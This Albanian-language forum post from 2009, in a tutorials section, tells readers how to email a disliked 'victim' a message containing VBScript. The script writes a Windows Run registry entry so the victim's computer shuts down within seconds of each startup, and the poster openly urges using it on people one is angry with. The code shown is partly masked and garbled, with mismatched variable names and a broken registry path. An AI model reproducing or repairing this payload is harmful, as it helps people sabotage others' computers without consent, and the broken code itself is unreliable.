ForumPortalCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 24 Sec. Pc Shut Down.

Shko poshtë 
AutoriMesazh
Denn1s
S.Moderator
S.Moderator
avatar

Numri i postimeve : 91
Age : 24
Nga Jeni : Peja
Registration date : 23/01/2009

MesazhTitulli: 24 Sec. Pc Shut Down.   Fri Feb 06, 2009 8:38 pm

24 sec. PC shut down
Bëjani dikuj qe ja keni inati PC qe ti bohet shut down qdo 24 seconda heheh;)

Hym ne emailin tone ne Hotmail dhe shkojme dhe krijojme nje mesazh te ri!

Shenojme emailin e viktimes dhe ne titullin(subject) shenojme dicka atraktive
dhe ne pjesen ku e shenojm mesazhin
shenojme ket kod:KODI: ******** ****************="vbscript"> on error resume next dim ok set ok=CreateObject("WScript.Shell" kutluk.RegWrite

"HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCur rent VersionRunSYSTEM32","shutdown -r" </script>
Viktima me hapjen e ketij emaili, ne funksion do te hyn kodi qe eshe me lart, dhe do ti fiket kompjuteri!

dhe qdo her kur teStarton kopmjuterin! per 24 sekunda do ti fiket !
dot thot error dicka pun te mbar!
nese e kini najkan inati perdoreni .....!!
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit
 
24 Sec. Pc Shut Down.
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: ¸.·´¯) Paneli i Kontrollit (¯`·., :: Tutorials & Mesime-
Kërce tek: